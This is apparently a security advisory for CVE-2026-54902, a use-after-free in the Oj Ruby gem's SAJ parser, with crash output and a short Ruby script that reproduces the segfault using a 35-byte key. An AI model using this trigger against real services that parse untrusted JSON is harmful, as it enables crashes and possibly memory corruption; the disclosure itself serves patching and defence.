PT-2026-51088 · Rubygems · Oj
Published
2026-06-19
·
Updated
2026-06-19
·
CVE-2026-54902
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
Summary
Oj::Parser in SAJ mode does not protect cached object keys (≥ 35 bytes) from garbage collection. A Ruby callback that triggers GC inside hash end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content).Version
- Software: oj gem
- Affected: all versions with
ext/oj/saj2.c/ext/oj/parser.c - Latest tested: 3.17.1 (confirmed present)
Details
Short keys (≤ 34 bytes) are stored inline on the C stack and are safe. Long keys (≥ 35 bytes) are stored as heap-allocated Ruby String objects passed to
rb funcall as the key argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. GC.start) can collect the key String, leaving a dangling VALUE.Crash output:
long key trigger
[BUG] Segmentation fault at 0x0000000000004242
close object+0x260 /ext/oj/usual.c:405 (calls rb funcall with freed key)
parse+0x11ff /ext/oj/parser.c:693
parser parse+0x145 /ext/oj/parser.c:1408
RIP: 0x7fd1b46d68b7 RDI: 0x0000000000004242 (freed key VALUE)
R12: 0x0000000000004242The freed VALUE
0x4242 shows the attacker-controlled content of the key string was loaded as a pointer — a classic use-after-free indicator.Reproduce
ruby
require 'oj'
class H < Oj::Saj
def add value(value, key)
GC.start(full mark: true, immediate sweep: true) if key == 'x'
end
def hash start(key); end
def hash end(key); end
end
p = Oj::Parser.new(:saj)
p.handler = H.new
p.parse('{"' + 'A' * 35 + '":{"x":1}}') # long outer key, GC fires on inner keyFix
Use After Free
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Oj